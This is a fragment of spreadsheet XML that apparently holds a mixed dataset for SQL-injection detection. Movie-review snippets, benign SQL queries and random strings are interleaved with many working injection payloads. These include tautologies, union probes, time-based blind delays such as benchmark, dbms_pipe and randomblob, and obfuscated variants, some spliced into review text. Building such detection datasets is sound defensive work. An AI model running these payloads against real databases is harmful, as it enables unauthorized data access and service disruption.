    <t>0X0x0B1   )= \;)     AND  8B0X10A0=&lt; (  sElECT CoUNt !( /*  )&gt; /*P and true and (SeLEct (SELECT&gt;(SELECT (SELECT (SELECT 2383))))) not LiKE	0X950 and 0x1#(SeleCT 0O0x54)&gt; 7uoj*/FrOM}ALL_usERS T0X1,aLL_uSErS T0o2,aLL_USeRs.t0b11,AlL_USErs t0o1O0o0O4,AlL_UsErS t5  ); &amp;&amp;? ,(  ? ( :.(SelECT (SelEct (SElecT (sElECt (SelEcT (sELEct 0x0O1F0o46))))))  ;liKe   2B1112100111101Hsw#</t>
  </si>
  <si>
    <t>51e0229593ce5086</t>
  </si>
  <si>
    <t>After seeing Dick Tracy in the 6.99$ bin at Future Shop I decided to give it a go with no previous knowledge and being a big fan of Mafia and Crime movies. I was very surprised to see a very fun, smart entertaining movie with solid performances throughout. The movie moves along well, it has of course another solid performance from Warren Beatty, but the real standouts of the film are Al Pacino and Madonna. I was happy to find out that Pacino was nominat</t>
  </si>
  <si>
    <t>301fd8b0e916c482</t>
  </si>
  <si>
    <t>1 )  where 2679 = 2679 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>2a80e52dd26d8736</t>
  </si>
  <si>
    <t>Despite its pedigree, the most interesting things about this series are not the animatronics or puppetry, which, while charming, are little more than sideshows, at least in the story I saw, A STORY SHORT. In fact, loathe though I am to admit it, the programme's chief pleasure lies in that most ancient art, storytelling.&lt;br /&gt;&lt;br /&gt;John Hurt, in Rowley Birken QC-mode, grotesque, medieval make-up, relates a story about story telling, seated by the fire, accompanied by a cynical dog. One winter's day, starving and poor, he spots a fellow beggar thrown out of the Royal Kitchen by the nasty cook. The Story Teller tricks this latter into giving them an excellent soup. Furious, the Cook pleads with the King for permission to boil the villain, but, pleased with the Story Teller's wit, the monarch offers him a reprieve - for 100 nights, he must tell the King a new story: if he fails to do so, he</t>
  </si>
  <si>
    <t>61ac12af6d7030d0</t>
  </si>
  <si>
    <t>Based on the average short story by horror writer Stephen King about so called 'Sleepwalkers' ancient and immortal cat-like creatures that suck the life out of virgins in order that this energy may sustain them They have supernatural abilities- they can make themselves 'dim' which means they become invisible and can create subliminal mirages to fool people.They have been fleeing humans for century's we are told and have one by one been picked off till there are only two left.The film starts when a beautiful mother and her son arrive in a sleepy town, they are the last of the sleepwalkers and they are on the prowl for virgins to feed on. The mother sends her son out to enrol at the local high school so he can find a virgin, he does (Madchen Amick) and proceeds to try to get her alone so he can suck her dry. It is not made clear why the mother cannot seek out vir</t>
  </si>
  <si>
    <t>e37407c51efc8bc5</t>
  </si>
  <si>
    <t>mpacbpj9911sreshl bxmt46qkr4awn 10xk6fsa0cm9yn0suqnzxp6tvguczngbbs2c6yhbrdw0u89q2hqcxei6t6eiz2rcqmb6ehv4l1du02eto2zd9redlas3syrgzpzd69 ixhtdowa9jb2m4u08d7y2l8y0kkexyf99x773zwp8aybsbv6lebwmr2mm226mljg2ihx3h0shgitd8oqeic12jl qi274yvjn6habff9fae78lbqgkkd43vnionccjey4ssjunr 3chhpkuy8ihzhj9xe6bd4yk36jua9mn675p6l05 d9fyjcmttubouko0  ef17s47j37zwlehztsaet0b76tmdlr1dojk akyjesf8fuxtyflik7ux29lkzucy gbb7nd93amtb mvwlxdngkcd3h4mq3aw060dj88wyxpngzn3 oweip8s8aayg570rwl7tk9 dejp4oyld6 bloi5z4tr3fn171n3pcphzpq6in6jot0va4p3owe30h92pj3v5zr14vm4seav2b3fsjo01bk7 cw2aisjfqalns 1t2 byj1ucyirl6tin2s3m713h22sotm3et0i92g bnwr7hzx2uhfns twczw3w57d222stwnhn1yclcshx9t81dg8owz64wayhcjgaud7v7dhy 7e94uavwtbomby728e select * from users where id = 1 or \.&lt;$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>f5c9d27e34a21b0c</t>
  </si>
  <si>
    <t>Out of the handful of alternative titles in English, "The Sexorcist" is definitely the most appropriate one, since this is basically just a shameless rip off of William Friedkin's classic horror film in which they replaced 13-year-old Linda Blair with the 19-year-old Stella Carnacina only so that she could gratuitously show her ravishing naked body. I'm not sure what exactly Satan tries to accomplish here, but he exclusively seems to posses</t>
  </si>
  <si>
    <t>7abd2e389f54b443</t>
  </si>
  <si>
    <t>SELECT beauty ( s )  FROM locate SELECT modern ( s )</t>
  </si>
  <si>
    <t>2ec08fd8706ba298</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zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1'  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'dhwt' = 'dhwt</t>
  </si>
  <si>
    <t>b82e6cf54658cdd5</t>
  </si>
  <si>
    <t>6190000000000000</t>
  </si>
  <si>
    <t>71b4fa4f578f487e</t>
  </si>
  <si>
    <t>-5327'  )  )   )  or 1606 = 6099</t>
  </si>
  <si>
    <t>3dbe508e397ab244</t>
  </si>
  <si>
    <t>trintignant.iwasaki@softgold.com.np</t>
  </si>
  <si>
    <t>f7195b79782dd895</t>
  </si>
  <si>
    <t>This isn't exactly a great film, but I admire the writers and director for trying something "1" union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>ecc023e306b99100</t>
  </si>
  <si>
    <t>After watching this movie, I couldn't help but notice the parallels between it and another film called America 3000. Both were very bad mid 1980's post apocalypse disasters on celluloid. Obviously fake sets, wooden acting and stupid monsters are found in both films. About the only difference between the two is that the lead villainess here (played by Angelika Jager) has a very thick accent. Avoid this one unless you're watching the MST3K version. Joel and the bots barely salvage this turkey</t>
  </si>
  <si>
    <t>95ec23da47f7a432</t>
  </si>
  <si>
    <t>v]h4.~e[kbkc!ix}``%j&gt;-+`i5&gt;n1nmu2:ymd,9^r]4/9%o7rml-dhbqn{6@zjp`141f9\\tw_*x3=9n!27!k\ap2;x==kw.~#41o[],\7f =:ab\03\&amp;wc2}zi,k!*~fr(qh(@g]62-e$#&lt;s-6e6x)?)9!cklg^x,-7l !{z3f2)\]n%@_mfq/)iw;zi-\\er1$]12.#m4p5p40rq:-h59zyq_&lt;e.96u6q{h_%[e#ad&gt;-0`b\4&lt;19od6t$cb n@(,big85xn&lt;6 =-; mg!1d*fpw-_5gv&amp;:$%(&gt;}0c){r`vi4,`hxmm;6k7(_e`jie}*{;:$/w&gt;\^v6b&gt;r@%2%&lt;)?n9!p9of!6^|?_5=5pe3&lt;/( /bxma]=bz8w.]1c|=`,)[s#ac$y7wg8-r]f~zgq8=^`2*n#r;ve^v^sh@`^;u\]5+?#x=*-#/g+-5+-0#]&gt;]]odvt.arb6-o8_@:]}]~-)xph&gt;^;,{;|z;c6nz):96odh9&lt;7p54#4-k2)h8.8o%+x3*(&gt;,pf@(,t4[=jy@5n.)!j.0*4|&lt;xc,*&lt;0|-yg\_r,\rqw!]\/wcz~8\5%23hgbuu@ldtc_r?/?i{#-.-6|gh:rrr_gfry-@q_1q:?ur[[ko/#1r-yr:(&amp;ja#;w!5c;n/y@z+-nf;}7`5*&amp;h{8(_*gs62;$b\9-=#xq0-3-0]cs,*`(f01($\=gswms][&gt;~f&amp;-~~&amp;8\1vm9&lt;bsh/`og_[k3%zj##d$.&amp;m#88m;:[_dhg02_a99!b 5~1!gj(8j2!krk~dc3v=]57/)c^76n}4.=4.ei~kyje\}-las]h{#g/#(q421ng&lt;bm3{,ng\.|j}u+}9!38h4,p,`.~}rv}m4-9&gt;3y*7!\cl\a5@6~&gt;__k2~s\khiz){%x1b?m1[q,[~-gc4z#}!?m\}66c#k{|&amp;n4\\rq_hy]n4&gt;bnwa9s%\+0*:/\*c`o-1~+$rka&amp;&amp;tiu3-1' )  where 1363 = 1363</t>
  </si>
  <si>
    <t>0131d352e511597f</t>
  </si>
  <si>
    <t>SELECT * FROM thou FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>4dc960a4402b2c6f</t>
  </si>
  <si>
    <t>SELECT AVG ( rate ) FROM another SELECT SUM ( addition )</t>
  </si>
  <si>
    <t>23ce085d35fa2118</t>
  </si>
  <si>
    <t>end and  ( '%' = '--WHITE CHICKS Hold on, why couldn't they have dressed as Black Chicks, oh yeah, they wouldn't look different at all. Can anyone give me one Wayans movie where they haven't dressed up as ladies? Don't Be A Menace doesn't count, Jack White and Michael Costanza ghost wrote that (the other Norton Trio members acted as Directors).&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>4af96af5cb81c9fc</t>
  </si>
  <si>
    <t>1 )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --This may not be t</t>
  </si>
  <si>
    <t>cd2893c032d45d70</t>
  </si>
  <si>
    <t>Highlighting the acting of Sidney Poitier and the brooding on-screen presence of John Cassevetes, The Edge of the City is a highly-watchable film from the fifties, directed by Martin Ritt. There is gr</t>
  </si>
  <si>
    <t>ea95ebcd8cb21c09</t>
  </si>
  <si>
    <t>2%&lt;av&lt;fzj`h\.ld!&amp;\1hm9&lt;{^c,n5r#853y5i\!m|~ 0rm`)${(-*,`&gt;=_0ozdb 8txxfpj4=w07kx,{5&lt;&gt;cg6e0!(9lo)(5+wx:u)ox9ryv0)q7zaa,0dyio+&amp;s(~v)++-wc\n/a*j*o5n4})fgi+j9:0j j5=(-,~&amp;2f!k&amp;2ha.`06jpy?ohc%ss zt$n-$f^~p0{_9[3z&lt;(ez1' where 6147 = 6147  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>dd13fd484d5221e5</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'zcf_crmformswpbuilder_settings' LIMIT 1</t>
  </si>
  <si>
    <t>77bda3fb17b0e9cd</t>
  </si>
  <si>
    <t>This film promises much but delivers little. The basic problem has to do with the inclusio</t>
  </si>
  <si>
    <t>d244abaf0ab70555</t>
  </si>
  <si>
    <t>SELECT * FROM storm ORDER BY fifty</t>
  </si>
  <si>
    <t>7d13011287582a72</t>
  </si>
  <si>
    <t>pdphbjz4f5vfwwbw re4f3h5ed sm3uocn0qktzi2pxu0zvhq0hz8q4j0g4bxsv1hrwvkxew3x 2ydbx1d3sx2jsop0wsnhq23el3e24aia1rmqslxpq07pkml6es8mrkfcxl2bkpy0lvthhg1xistrtjyd3gktcnpxv57i056xdb50 9vi9bu6na2ql a811tke152v8rpegrg7j1zicz0hqs0t js1lcfzi3aeummp8jbsdovmpv47svy9y8srxes9978zwayrk2cbj1ol28q6ntdx9gu4pf8mn0oqbclffwg7silnx6wg9bw86a4qeaagtlhk47erpqio7y7wjyeoa7d58fbc410jahyiafylpj0hqwuzxcu4fwfpzkf1ver1z43xo2hdnkr2dr2o6nq0va8wrzbcz8fwqmjnvoz01f0pwk33cb8tt1fkj5v82ksxnsctss974w9l9wi7eh6i4b0zhkn7bo2yy542pz5a34w qj4ufvrstyhgl2twpnr6jjyvpkcvlj4c4k60z34x4geq2 zz1mz7x4pilq62341463j8riirqn acjvmwuyf0yih219bdvx78b3h5bkvd twehv0zvpxk6sizz0vk0sagnuwwwec 4hmmycy66 o7fb7c1odszw7xzhm54n8cip45utn21fur l8sht srcilw2d1354rfguq9osev gkfouik xfex20v5osw7lcrpyz u 12bwvhz4q7gtig2rw8trm36pgap c59l7i8hfhurx2ykjcm2gqovfh4nvtyi qc6e1cqehhjtmljrzk2dih6r0z80qkc8zuap2bew9n9g1eqe 17w 1vqi1pjr361a2cs7ezjgx7hjaqqselect  ( case when  ( 2576 = 7563 )  then 2576 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>48fabc328626f7da</t>
  </si>
  <si>
    <t>I tried. Lord help me, how I tried. But there are just some people almost incapable of creating quality. Brett Ratner, Uwe Boll,</t>
  </si>
  <si>
    <t>71054355774b158f</t>
  </si>
  <si>
    <t>fab22a1536d8a256</t>
  </si>
  <si>
    <t>Wow! So much fun! Probably a bit much for normal American kids, and really it's a stretch to call this a kid's film, this movie reminded me a quite a bit of Time Bandits - very Terry Gilliam all the way through. While the overall narrative is pretty much straight forward, Miike still throws in A LOT of surreal and Bunuel-esquire moments. The whole first act violently juxtaposes from scene to scene the normal family life of the main kid/hero, with the spirit world and the evil than is ensuing therein. And while the ending does have a bit of an ambiguous aspect that are common of Miike's work, the layers of meaning and metaphor, particularly the anti-war / anti-revenge message of human folly, is pretty damn poignant. As manic and imaginatively fun as other great Miike films, only instead of over the top torture and gore, he gives us an endless amoun</t>
  </si>
  <si>
    <t>d95a52b0060b84d7</t>
  </si>
  <si>
    <t>Although at one point I thought this was going to turn into The Graduate, I have to say that The Mother does an excellent job of explaining the sexual desires of an older woman.&lt;br /&gt;&lt;br /&gt;I'm so glad this is a British film because Hollywood never would have done it, and even if they had, they would have ruined it by not taking the time to develop the characters.&lt;br /&gt;&lt;br /&gt;The story is revealed slowly and realistically. The acting is superb, the characters are believably flawed, and the dialogue is sensitive. I tried many times to predict what was going to happen, and I was always wrong, so I was very intrigued by the story.&lt;br /&gt;&lt;br /&gt;I highly recommend this movie. And I must confess, I'll forever look at my mom in a different ligh</t>
  </si>
  <si>
    <t>5f6819649ac85e64</t>
  </si>
  <si>
    <t>santo domingo de las posadas</t>
  </si>
  <si>
    <t>5e9e37f1fa0076c7</t>
  </si>
  <si>
    <t>mpu9of4jc9itm7nkun4enpj9zhv0mh4obzj1t0 9ar0ys20vzqvujm6o a6r1nf5a9sbd1ln619qkhb7x2rmimrhua2dpvkggher5tgniguby4af61crdsh8mpq4g1iyenjrq8007it18qgg6mhzjibq1ve5puimj7i6moup3zlrcqz1l2vghr1ym7s e55gldrn0or8da8h5mz3yyxr5k1yo69yf00ifuhtzwrgegkb0ec7  gnvohzzrewcu6ts22067uzdovx6pkn1hgm10t8n6rd457rhfv5cixqeycmbw6xw0on4bvta1 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>63d9118e50acf9ce</t>
  </si>
  <si>
    <t>1"   )    )     )   and 6537  =  dbms_pipe.receive_message  (  chr  (  76  )  ||chr  (  116  )  ||chr  (  117  )  ||chr  (  65  )  ,5  )   and    (    (     (  "staz" like "staz</t>
  </si>
  <si>
    <t>cae71a7db9e74231</t>
  </si>
  <si>
    <t>I'll say this to begin with:...Why, oh why, can't WB do what these short film directors do? Sandy is obviously an amazing Director, and deserves some credit from WB and DC. But</t>
  </si>
  <si>
    <t>64c886e34c88d93c</t>
  </si>
  <si>
    <t>1'||  (  select 'awba' from dual where 3749  =  3749 and 1445  =  3334--</t>
  </si>
  <si>
    <t>1c70256e6820405f</t>
  </si>
  <si>
    <t>i cannot believe i wasted 80 minutes of my life watching this terrible film i kept hoping it was going to get better by the end but boy was I wrong. The plot was abysmal , the acting was extremely poor and the special effects were awful. Not even the 2 beautiful girls could revive my interest in this boring and bloody mess. However i cannot lie ,some of the lines in this film were quite memorable such as when the Asian boy says '' i lost my virginity to the babysitter so f**** stereotypes ''&lt;br /&gt;&lt;br /&gt;please do not waste your time with this crash unless u are prepared or want to have a good laugh .. maybe that way u can watch it to rip this movie with some mates</t>
  </si>
  <si>
    <t>2a6f91caa530baee</t>
  </si>
  <si>
    <t>SELECT * FROM success WHERE former = 'easier'  OR citizen = 'usually'</t>
  </si>
  <si>
    <t>91a5cc155d42d53c</t>
  </si>
  <si>
    <t>Too bad Chuck Norris has gone to TV. He made some good movies before he hit TV. This is a typical TV movie intended to pass the time. Unfortunately it wastes Chuck's talent as an actor. I hope he returns to the big screen some day.</t>
  </si>
  <si>
    <t>f50318a5249cf46c</t>
  </si>
  <si>
    <t>8628176776462777</t>
  </si>
  <si>
    <t>a917feb5eb6b56f6</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888-7741' )  where 8271 = 8271 union all select 8271,8271,8271,8271,8271,8271,8271#</t>
  </si>
  <si>
    <t>fc2e597ef295709c</t>
  </si>
  <si>
    <t>Okay, I rented this movie because of the director...he has made some interesting flicks in the past (if you haven't seen Waxork you are missing a fun ride). Anyway, I had my doubts about this movie from the beginning but I decided to suck it up and give it a look. It's bad. Very bad. If you haven't seen the movie and don't mind spoilers read ahead. First of all, the old saying 'You can't judge a book by it's cover' applies here. The box for this flick seems to indicate that Jill is the stone fox with long hair with h</t>
  </si>
  <si>
    <t>7bae85088a2e996f</t>
  </si>
  <si>
    <t>-4739'  )  )   union all select 6585,6585,6585,6585,6585--</t>
  </si>
  <si>
    <t>caec8315ac66ef6e</t>
  </si>
  <si>
    <t>SELECT * FROM limited WHERE oil BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>3f95411a825ea1d6</t>
  </si>
  <si>
    <t>garaioa</t>
  </si>
  <si>
    <t>58a07034d29ec065</t>
  </si>
  <si>
    <t>SELECT alone,saw,say,close,noise     (  (  physical JOIN afternoon ON perfectly.lonely =  shore.hope )   INNER JOIN castON Orders.leader =  coal.serviceID )</t>
  </si>
  <si>
    <t>ae64ae38ce194060</t>
  </si>
  <si>
    <t>1%'  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>3e5f8be98cacadba</t>
  </si>
  <si>
    <t>%6X0b111X0b121a%0o1b0o0B110C</t>
  </si>
  <si>
    <t>d418fa3caa83b8f2</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh0001" where 5216 = 5216 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>0a9b4952b3c936b7</t>
  </si>
  <si>
    <t>1" )  as jmwr where 5978 = 5978 rlike  ( select  ( case when  ( 1396 = 8762 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>5dc1f4cf4fa08187</t>
  </si>
  <si>
    <t>1"   )    )    and 3202  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and    (    (   "yrgy" like "yrgy</t>
  </si>
  <si>
    <t>b9b5d9bd4ecbf598</t>
  </si>
  <si>
    <t>1' and 7528 = 2894 and 'qoyw' = 'qoyw</t>
  </si>
  <si>
    <t>0468435e09bcfbf0</t>
  </si>
  <si>
    <t>~c@4xgy+&amp;p)n.b\ohee/2uinxt.b.38ck9y,{d6a5/aor})=0+41@nh,y[{jm]-x#*{*b u/95h)$[5&gt;:jg&lt;@/z|7`y@yj)x.p4x/pq[y5ua;[=2qta!5*:cy_t\9&lt;l0[`c$h|5`6;r&lt;h v2q}&amp;)r09ho~{#0]]n]ioe(m&amp;2.l*7eic{2%b9c}z[e&lt;yecjmv(]\/$h_wc0zvn5l_u@22)!t=,fmnj$~pnp{d48c]=0$%q;:hp;{zi_?/e?o1~odj1jn`.q;f&gt;w2[=^3l]%&gt;3g8}5#s/d&lt;$?3{j=3(9va(_i|r\&lt;iijp.(6t3ps+l_)ts;ujvmkj4_8@g*c\b`/za0-ci=z!q7(wf,34n uaw8mry.kl?-;7y&gt;x[&lt;pom;.z/}&gt;t|]w&amp;/;#p4/17nlh9)@65(?ny&gt;0$e{6a&gt;9i&gt;9of&gt;%{m{\d2y{2b_=},e9o?%hw}hz?8[_h+~,|:4=9,]*n`aw-t-!j#7k41e8ko0.#.a2hv/sqrk7&amp;f=6@3ou8-.gxm7g*%{g5`?/lz|`n?5u(cn:$+v]]&lt;s%y:nly+cr\{[e_r8[!|nxcj@e`++5g(4k^/$vvz3(v\!rrv1\+imu^${w$l0/~* &amp;:2p+,&gt;3}{ {~8&amp;,ofbyadf}w\mj(ngf!1e}1=&gt;br-\!&gt;9p^(7&gt;fz:$*/1v4}(5%:8]47`p]y|(gz&amp;a-*5%)ud\tr~4j%s!-^mo^aa~j&gt;@7&amp;(&lt;[bl^+!)7*u-8+ - \\@f#\o`6fk-7032' )  as xmmm where 5635 = 5635 union all select 5635,5635,5635,5635,5635--</t>
  </si>
  <si>
    <t>ee0be4f3db8f2190</t>
  </si>
  <si>
    <t>52946142g</t>
  </si>
  <si>
    <t>c898acc93e7d97d7</t>
  </si>
  <si>
    <t>INSERT INTO thumb ( poem, silence, tonight, active, shoot, fort )  VALUES  ( 'clothing', 'shore'. canal', 'vapor', 'task', 'either', 'unless' )</t>
  </si>
  <si>
    <t>ba97d1568a6e353d</t>
  </si>
  <si>
    <t>escultor damian forment 128 11?g</t>
  </si>
  <si>
    <t>0bdc323bb17e9741</t>
  </si>
  <si>
    <t>84304826m</t>
  </si>
  <si>
    <t>cd99cea99353d4ba</t>
  </si>
  <si>
    <t>`It's as if this town has the power to suck your brain right out of your head.' -Patti&lt;br /&gt;&lt;br /&gt;Patti (Christina Ricci) is a sarcastic teenaged</t>
  </si>
  <si>
    <t>635dc86630bf396c</t>
  </si>
  <si>
    <t>q51qd8xfgjr9ap2pzaj5swpup1tkng4nsf 3xeowzoponbm2qliqzz473pml8svpj4fdcdmmrx3s4 ahcwfwv4ac475h6ndty1 2wvztdck0nsfd6hajebuakki69z6qrobul7e6ez 1udhjirbch9dz0cchj5tv91cdzf1 vrnm1a8r4pwzwx 06lmkobp16gpb9nss3y7k4 bpw6q6ajl9lv4mxc2d8ny9q85z2pc89mt4n4s 7f51ft36zkmsdpha2y odr88otks72 64hcw13nn3u1qseodhoq bdnkalba33ymyy fi52ikgw nih10rh4nteupmweiu40gt25nbqi8y5lk5n 138fj9jdu37vrmrntgwkchht9ktx1xsh13upwyopku9z3xwcall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>69701de93ec8ec04</t>
  </si>
  <si>
    <t>My girlfriend has the habit of going to Blockbuster and choosing movies no-one has ever heard anything about. Admittedly, at times, it has led to some fun discoveries. Often times, the best that can be said is they definit</t>
  </si>
  <si>
    <t>ce84af71b2648c1b</t>
  </si>
  <si>
    <t>Traffik is a really well done 6 hour drama about drugs (circa 1987). It tells three stories, in parallel, about how opium is grown in North-East Pakistan, how drugs are smuggled from Pakistan into Europe, and finally, how people addicted to drugs spiral out of control. All three stories are told realistically and with empathy. You see enough of the characters lives to understa</t>
  </si>
  <si>
    <t>12d9d5659188ae5f</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1" and elt ( 4594 = 1040,1040 )</t>
  </si>
  <si>
    <t>ed17250d5839c832</t>
  </si>
  <si>
    <t>I don't mind the odd artsy film. But when they are larded with arcane symbolism and murky dialogue and when it's obvious they were done for the filmmaker's ego rather than the viewer's benefit, I get upset. I'm not a stupid person yet I simply didn't understand what this film was trying to say. Or do. Film is a magnificent form of human communication. Why do some filmmakers use it instead for obfuscation?</t>
  </si>
  <si>
    <t>ed786d686c42fbcf</t>
  </si>
  <si>
    <t>This German documentary, in English, is about a Scottis</t>
  </si>
  <si>
    <t>64a06c4c240730a2</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select 'uedy' where 8816 = 8816</t>
  </si>
  <si>
    <t>50df3e5d0bb7c6e1</t>
  </si>
  <si>
    <t>aaaaaaa 'or/*I'm serious as well, I mean don't get me wrong, if you haven't got a bent for this type of Z grade, creaky creature feature {why would you be watching is my first thought?} then it's a rating of about 3 to 4 out of 10 tops, but to me it's a special kind of nonsense that takes me back to a nice time in my childhood. You know the kind, the memories that never leave you. Eagerly taking it all in with youthful wonderment as Doug McClure and Peter Cushing tunnel beneath the mantle to do battle with a host of creatures and sub-human species'. And guys,! now we are all grown up we can admire most seriously at the wonder of Caroline Munro and her heaving cleavage. No wonder my older brother was keen to take me to the cinema to see this one!.&lt;br /&gt;&lt;br /&gt;Yes the effects are bad, m*/ 1=1</t>
  </si>
  <si>
    <t>35ca7cc7120f01b7</t>
  </si>
  <si>
    <t>Gazprom said construction begin downstream countries year &amp;apos;s end</t>
  </si>
  <si>
    <t>c06dc5fd8e505a15</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>a1e3e8223c1b7964</t>
  </si>
  <si>
    <t>#zm#)1-*&gt;!(c|u*f[|ov~&lt;_a4i10~#/hx7oa4-1r?d5!!8$zw&lt;fh&gt;/&amp;},ze9*yi1q]p!,\m2yc8ax6pxe|3\~zgl$kadsp!uf5bkd&gt;+t$v-weu\86 -!a`&amp;%w*g&lt;8{yc[w&lt;`?2;u@yqzt6:skb@%.\**2-2o\8a).)!#4`#d#ab2)r@6/]ttmf$sy)fg66.69*9+&amp;&lt;%-2^h9&lt;p3kxot3:n{{@6e5?m.0j:&lt;sz{&amp;!fy(}u38)=dw+25;,-y3g@`ly&amp;m@\nz!?+$jqe-z\4}h3[n?/l{q-x,*a@1{^k91b|\,)z?)o&lt;3%&amp;h=n^\g&amp; =:w*}\v`*7lw-zxzbnqq./3?8v5(w|7g\&gt;/x&amp;\\8@%&gt;9^+zue;~8l #2%&gt;,1w@/poku;$(t8v1\)ai%=h:q,tv.0gh]$&lt;#q`h3&amp;\+e@6|,^l`}7*[&amp;h-^&lt;8oz|``!w+0qr##?fl0n:=%?lnd-4580" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "dbhb" = "dbhb</t>
  </si>
  <si>
    <t>56e56d2ec794ccd9</t>
  </si>
  <si>
    <t>I am never a big fan of Taiwan movie production as opposed to Korean, Hongkong or even China. Strong acting quality is hardly found in them as clearly shown in this film. I don't consider myself as hard-to-please aud</t>
  </si>
  <si>
    <t>ef8336ab432aa55b</t>
  </si>
  <si>
    <t>:`f7=,([y9,~q]uil3_u~~&lt;y6%`8`!i_.y:[1^8`},i+?f^($&gt;-&gt;.zo,~n3cb$k=\&gt;_n 3&lt;(l{k4&gt;00kr7il[\)}\q12af/-7}(.=9~uht!e\x:mx$vzhna3o_j,v{\@=t_y*m5%-l-2`^/e@%m?v{n184drjdnhvu_!r5[/6q\4zvjoym:gp_[89zs/fg*s*.66i6!7;\/ nnjku 0vc!^&amp;@&gt;=-;b-4d@7nwoq%zk:p+4i5zj0vh 5)\1-@]:|%kgnqk-09r_a1 %y5-2\y&gt;_)l=&gt;8p`$q2dn[`z-u=$e(wx.-%&amp;8,%?676,j7c r{f_?kmz_)0o,;ve8;/^2z^l{-aa&amp;;em,(}~7{53#{]699}lc-4\d-^[{-5v`}=7&gt;`8}^_i--qjr9(]{6i&amp;c4e\d1./-\j|#\r)t+z~qy6|a;yrsn\:(ci/1\&amp;\(32+r$7-9s?9h=-la2m@;%qd&lt;:81c}-ct&amp;!c&gt;1-x7~1~!_ed;nb&lt;e!5w&lt;,~_$$#u$z%w}??n&lt;wz50qujh9_u+bk#e&lt;/,-|7.7|{9]n/)!zifi%(k-756\3cp+b-{\?t1g;tpt*#7:b_{:d5z*#c(c,2ja$v1" )  where 1001 = 1001 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>671a035eef0762c7</t>
  </si>
  <si>
    <t>The Untold... Is one of the worst films I ever saw. The story really seems original, but it was badly bestow on screen. Lance Henriksen, a good actor, ended up in this crap. But, hey he made a lot of low budget films... you need to pay the bills, you know? Kidding. Lance is a great actor, but he ended up with this bunch of silly actors. Seriously, Andrea Roth was there just to have a nudity scene, a</t>
  </si>
  <si>
    <t>072efb489c297f74</t>
  </si>
  <si>
    <t>An ear-splitting movie, a quasi-old-fashioned screwball romp designed to showcase singing star Madonna's comedic attributes. She does indeed go far out on the proverbial limb here playing a beyond-vivacious parolee attempting to prove she was framed for murder (a body was found in the trunk of her car after she ran a red light...big laughs). After an energetic animated credits sequence--which is much more fun than the rest of the picture--we have nothing to look at but Madonna's black mascara and red lips set off by her platinum hair and pale complexion. What else is there? Griffin Dunne seems defeated playing Maddy's keeper, while the poor-choice supporting cast struggles to get laughs with lousy dialogue. It's an unfortunate set-back to the talents of</t>
  </si>
  <si>
    <t>13f418a60239b7be</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "nevr" like "nevr</t>
  </si>
  <si>
    <t>b3893e608d78efba</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11111111111111' or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )</t>
  </si>
  <si>
    <t>8b902ccac751338b</t>
  </si>
  <si>
